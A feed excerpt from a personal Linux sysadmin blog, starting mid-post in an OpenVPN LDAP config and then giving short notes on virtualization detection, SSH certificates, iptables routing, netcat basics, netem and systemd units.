style="display:flex;"><span> &lt;Group&gt; </span></span><span style="display:flex;"><span> <span style="color:#75715e"># BaseDN &#34;ou=Groups,dc=example,dc=com&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># SearchFilter &#34;(|(cn=developers)(cn=artists))&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># MemberAttribute uniqueMember</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Add group members to a PF table (disabled)</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># PFTable ips_vpn_eng</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> BaseDN <span style="color:#e6db74">&#34;ou=vpn,dc=boqii-inc,dc=com&#34;</span> </span></span><span style="display:flex;"><span> SearchFilter <span style="color:#e6db74">&#34;(cn=openvpn)&#34;</span> </span></span><span style="display:flex;"><span> MemberAttribute <span style="color:#e6db74">&#34;member&#34;</span> </span></span><span style="display:flex;"><span> &lt;/Group&gt; </span></span><span style="display:flex;"><span>&lt;/Authorization&gt; </span></span></code></pre></div><p>Copy the <code>ca.crt</code> certificate under <code>/etc/openvpn/key</code> for client use.</p>https://linzeyan.github.io/posts/2020/20200729-easy-way-to-determine-virtualization-technology/Wed, 29 Jul 2020 21:11:45 +0800https://linzeyan.github.io/posts/2020/20200729-easy-way-to-determine-virtualization-technology/<ul> <li><a href="https://qastack.cn/unix/89714/easy-way-to-determine-virtualization-technology" target="_blank" rel="noopener">An easy way to identify virtualization technology</a></li> </ul> <h3 id="dmidecode--s-system-product-name"><code>dmidecode -s system-product-name</code></h3> <p>Virtualization technology</p> <h4 id="vmware-workstation">VMware Workstation</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>root@router:~# dmidecode -s system-product-name </span></span><span style="display:flex;"><span>VMware Virtual Platform </span></span></code></pre></div><h4 id="virtualbox">VirtualBox</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>root@router:~# dmidecode -s system-product-name </span></span><span style="display:flex;"><span>VirtualBox </span></span></code></pre></div><h4 id="qemu-and-kvm">QEMU and KVM</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>root@router:~# dmidecode -s system-product-name </span></span><span style="display:flex;"><span>KVM </span></span></code></pre></div><p>QEMU (emulation)</p> <h4></h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>root@router:~# dmidecode -s system-product-name </span></span><span style="display:flex;"><span>Bochs </span></span></code></pre></div><h4 id="microsoft-virtual-pc">Microsoft Virtual PC</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>root@router:~# dmidecode | egrep -i <span style="color:#e6db74">&#39;manufacturer|product&#39;</span> </span></span><span style="display:flex;"><span>Manufacturer: Microsoft Corporation </span></span><span style="display:flex;"><span>Product Name: Virtual Machine </span></span></code></pre></div><h4 id="virtuozzo">Virtuozzo</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>root@router:~# dmidecode </span></span><span style="display:flex;"><span>/dev/mem: Permission denied </span></span></code></pre></div><h4 id="en">en</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>root@router:~# dmidecode | grep -i domU </span></span><span style="display:flex;"><span>Product Name: HVM domU </span></span></code></pre></div><h3 id="devdiskby-id"><code>/dev/disk/by-id</code></h3> <p>If you do not have permission to run <code>dmidecode</code>, you can use: <code>ls -1 /dev/disk/by-id/</code></p>https://linzeyan.github.io/posts/2020/20200708-ssh-certificate/Wed, 08 Jul 2020 13:39:48 +0800https://linzeyan.github.io/posts/2020/20200708-ssh-certificate/<ul> <li><a href="https://www.ruanyifeng.com/blog/2020/07/ssh-certificate.html" target="_blank" rel="noopener">SSH certificate login guide</a></li> </ul> <h3 id="certificate-login-flow">Certificate login flow</h3> <p>Before using SSH certificate login, you need to generate certificates. The steps are:</p> <ol> <li>The user and the server both send their public keys to the CA.</li> <li>The CA uses the server public key to generate a server certificate and sends it to the server.</li> <li>The CA uses the user public key to generate a user certificate and sends it to the user.</li> </ol> <p>Once certificates are in place, the user can log in. SSH handles the whole process automatically.</p>https://linzeyan.github.io/posts/2020/20200414-6844904122794115086/Tue, 14 Apr 2020 22:01:02 +0800https://linzeyan.github.io/posts/2020/20200414-6844904122794115086/<ul> <li><a href="https://juejin.cn/post/6844904122794115086" target="_blank" rel="noopener">Surprisingly, you can view images in the Linux CLI?</a></li> </ul> <h4 id="fim">FIM</h4> <blockquote> <p><code>sudo apt-get install fim</code></p></blockquote> <p>Common shortcuts for images in FIM:</p> <ul> <li>PageUp / Down: previous/next image</li> <li>+/-: zoom in/out</li> <li>a: auto scale</li> <li>w: fit width</li> <li>h: fit height</li> <li>j / k: pan down/up</li> <li>f / m: flip/mirror</li> <li>r / R: rotate (clockwise/counterclockwise)</li> <li>ESC / q: quit</li> </ul> <h4 id="viu">Viu</h4> <blockquote> <p><code>cargo install viu</code></p></blockquote> <h4 id="lsix">Lsix</h4> <blockquote> <p><code>sudo apt-get install imagemagick</code></p> <p><code>wget https://github.com/hackerb9/lsix/archive/master.zip</code></p></blockquote>https://linzeyan.github.io/posts/2019/20191204-ip-tables-rule-load-balance/Wed, 04 Dec 2019 11:08:04 +0800https://linzeyan.github.io/posts/2019/20191204-ip-tables-rule-load-balance/<ul> <li><a href="https://blog.outv.im/2019/ip-tables-rule-load-balance/" target="_blank" rel="noopener">Load Balancing with iptables and ip rule</a></li> </ul> <h4 id="steps">Steps</h4> <p>This example uses an Arch Linux device with two Internet uplinks: eth0 and eth1. The mapping is:</p> <ul> <li>Mark 10 (0xa) - Routing table #110 - use eth0</li> <li>Mark 11 (0xb) - Routing table #111 - use eth1</li> </ul> <p>We decide which uplink to use based on the packet mark. First, use ip rule to map each mark to its routing table.</p> <p>The default routing table priority is 32768. To ensure our tables are used, set a higher priority (for example 31000).</p>https://linzeyan.github.io/posts/2019/20191007-fuck-cmcc/Mon, 07 Oct 2019 10:41:08 +0800https://linzeyan.github.io/posts/2019/20191007-fuck-cmcc/<ul> <li><a href="https://v2c.tech/Article/FUCK-CMCC" target="_blank" rel="noopener">Fighting ISP Cache Hijacking Again with iptables</a></li> </ul> <h5 id="cause">Cause</h5> <p>The fight against the carrier cache problem started two years ago. The carrier even cached cnpm data. Worse, their cache servers were not only slow like a turtle in a marathon, they also crashed frequently, so I just wanted to write code but had to face a wall of red errors.</p> <h5 id="fix">Fix</h5> <p><code>iptables -I FORWARD -p tcp -m tcp -m ttl --ttl-gt 20 -m ttl --ttl-lt 30 -j DROP</code></p>https://linzeyan.github.io/posts/2019/20190710-linux-command-line-du-dh-lsof/Wed, 10 Jul 2019 09:57:33 +0800https://linzeyan.github.io/posts/2019/20190710-linux-command-line-du-dh-lsof/<ul> <li><a href="https://www.itread01.com/content/1542767890.html" target="_blank" rel="noopener">Fixing Disk Space Not Freed on Linux</a></li> </ul> <h5 id="use-df--ah-and-du--h---max-depth1">Use <code>df -ah</code> and <code>du -h --max-depth=1</code></h5> <p>The total from <code>du</code> is far smaller than the total reported by <code>df</code>.</p> <p>When a process deletes files but keeps running, the files are not actually removed, so disk space is not freed, and those files are not counted.</p> <p><code>lsof |grep delete</code></p>https://linzeyan.github.io/posts/2018/20181218-fonts/Tue, 18 Dec 2018 22:13:40 +0800https://linzeyan.github.io/posts/2018/20181218-fonts/<ul> <li><a href="https://hk.saowen.com/a/8e1349c5e25aaca06614d56d65fcd43156684d591da80b5a886806ceac06e199" target="_blank" rel="noopener">Install Font Libraries and Chinese Fonts on Linux CentOS 7</a></li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>yum -y install fontconfig </span></span></code></pre></div><p>Now you can see the fonts and fontconfig directories under /usr/shared (they did not exist before).</p> <p>Before that we need to create a directory. First create /usr/shared/fonts/chinese.</p> <p><code>mkdir /usr/shared/fonts/chinese</code></p> <p>Copy the fonts you need and upload them to /usr/shared/fonts/chinese. Here I use SimSun and HeiTi (used in reports). You will see files with ttf and ttc extensions.</p>https://linzeyan.github.io/posts/2018/20181217-what-is-the-sha256-that-comes-on-the-sshd-entry-in-auth-log/Mon, 17 Dec 2018 16:11:43 +0800https://linzeyan.github.io/posts/2018/20181217-what-is-the-sha256-that-comes-on-the-sshd-entry-in-auth-log/<ul> <li><a href="https://serverfault.com/questions/888281/what-is-the-sha256-that-comes-on-the-sshd-entry-in-auth-log" target="_blank" rel="noopener">What is the SHA256 that comes on the sshd entry in auth.log?</a></li> </ul> <p><code>ssh-keygen -lf .ssh/id_rsa.pub</code></p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>cat .ssh/id_rsa.pub | </span></span><span style="display:flex;"><span> awk <span style="color:#e6db74">&#39;{ print $2 }&#39;</span> | <span style="color:#75715e"># Only the actual key data without prefix or comments</span> </span></span><span style="display:flex;"><span> base64 -d | <span style="color:#75715e"># decode as base64</span> </span></span><span style="display:flex;"><span> sha256sum | <span style="color:#75715e"># SHA256 hash (returns hex)</span> </span></span><span style="display:flex;"><span> awk <span style="color:#e6db74">&#39;{ print $1 }&#39;</span> | <span style="color:#75715e"># only the hex data</span> </span></span><span style="display:flex;"><span> xxd -r -p | <span style="color:#75715e"># hex to bytes</span> </span></span><span style="display:flex;"><span> base64 <span style="color:#75715e"># encode as base64</span> </span></span></code></pre></div>https://linzeyan.github.io/posts/2018/20181109-linux-utility-netcat-examples/Fri, 09 Nov 2018 00:17:47 +0800https://linzeyan.github.io/posts/2018/20181109-linux-utility-netcat-examples/<ul> <li><a href="https://blog.gtwang.org/linux/linux-utility-netcat-examples/" target="_blank" rel="noopener">Netcat (Linux nc) Practical Examples for Network Admins</a></li> </ul> <h4 id="send-a-test-udp-packet-to-a-remote-server">Send a test UDP packet to a remote server</h4> <p>This command sends a UDP test packet to the specified host and port. The <code>-w1</code> option sets the timeout to 1 second.</p> <p><code>echo -n &quot;foo&quot; | nc -u -w1 192.168.1.8 5000</code></p> <h4 id="open-a-udp-port-to-receive-data">Open a UDP port to receive data</h4> <p><code>nc -lu localhost 5000</code></p> <h4 id="port-scanning-on-a-remote-host">Port scanning on a remote host</h4> <p>This command scans TCP ports in the ranges 1-1000 and 2000-3000 on the specified host to see which ports are open.</p>https://linzeyan.github.io/posts/2018/20180915-simulate-network-anomalies-using-tc-and-netem/Sat, 15 Sep 2018 16:17:26 +0800https://linzeyan.github.io/posts/2018/20180915-simulate-network-anomalies-using-tc-and-netem/<ul> <li><a href="https://www.hi-linux.com/posts/35699.html" target="_blank" rel="noopener">Simulate Network Anomalies with TC and Netem</a></li> </ul> <blockquote> <p>Netem and TC brief overview</p> <p>Netem is a network emulation module provided by Linux 2.6 and later kernels. It can be used on a good LAN to simulate complex Internet transmission performance, such as low bandwidth, latency, packet loss, and so on. Many Linux distributions with kernel 2.6+ enable this module by default, such as Fedora, Ubuntu, Redhat, OpenSuse, CentOS, Debian, etc.</p> <p>TC is a user-space tool in Linux, short for Traffic Control. TC controls the operating mode of the Netem module. In other words, to use Netem you need at least two conditions: the Netem module must be enabled in the kernel, and the corresponding user-space tool TC must be available.</p>https://linzeyan.github.io/posts/2018/20180814-quagga-routing--install-configure-and-setup-bgp/Tue, 14 Aug 2018 22:13:12 +0800https://linzeyan.github.io/posts/2018/20180814-quagga-routing--install-configure-and-setup-bgp/<ul> <li><a href="https://www.psychz.net/client/kb/en/quagga-routing--install-configure-and-setup-bgp.html" target="_blank" rel="noopener">Quagga Routing - Install, Configure and setup BGP</a></li> </ul>https://linzeyan.github.io/posts/2018/20180809-systemd-tutorial-part-two/Thu, 09 Aug 2018 13:53:32 +0800https://linzeyan.github.io/posts/2018/20180809-systemd-tutorial-part-two/<ul> <li><a href="http://www.ruanyifeng.com/blog/2016/03/systemd-tutorial-part-two.html" target="_blank" rel="noopener">Systemd Tutorial: Practical Part</a></li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>$ systemctl cat sshd.service </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>Unit<span style="color:#f92672">]</span> </span></span><span style="display:flex;"><span>Description<span style="color:#f92672">=</span>OpenSSH server daemon </span></span><span style="display:flex;"><span>Documentation<span style="color:#f92672">=</span>man:sshd<span style="color:#f92672">(</span>8<span style="color:#f92672">)</span> man:sshd_config<span style="color:#f92672">(</span>5<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span>After<span style="color:#f92672">=</span>network.target sshd-keygen.service </span></span><span style="display:flex;"><span>Wants<span style="color:#f92672">=</span>sshd-keygen.service </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>Service<span style="color:#f92672">]</span> </span></span><span style="display:flex;"><span>EnvironmentFile<span style="color:#f92672">=</span>/etc/sysconfig/sshd </span></span><span style="display:flex;"><span>ExecStart<span style="color:#f92672">=</span>/usr/sbin/sshd -D $OPTIONS </span></span><span style="display:flex;"><span>ExecReload<span style="color:#f92672">=</span>/bin/kill -HUP $MAINPID </span></span><span style="display:flex;"><span>Type<span style="color:#f92672">=</span>simple </span></span><span style="display:flex;"><span>KillMode<span style="color:#f92672">=</span>process </span></span><span style="display:flex;"><span>Restart<span style="color:#f92672">=</span>on-failure </span></span><span style="display:flex;"><span>RestartSec<span style="color:#f92672">=</span>42s </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>Install<span style="color:#f92672">]</span> </span></span><span style="display:flex;"><span>WantedBy<span style="color:#f92672">=</span>multi-user.target </span></span></code></pre></div><h4 id="unit-section-startup-order-and-dependencies">[Unit] Section: Startup Order and Dependencies</h4> <p><code>After</code> field: if <code>network.target</code> or <code>sshd-keygen.service</code> needs to start, then <code>sshd.service</code> should start after them.</p> <p>Correspondingly, the <code>Before</code> field defines which services <code>sshd.service</code> should start before.</p> <p>Note that After and Before only involve startup order, not dependency relationships.</p>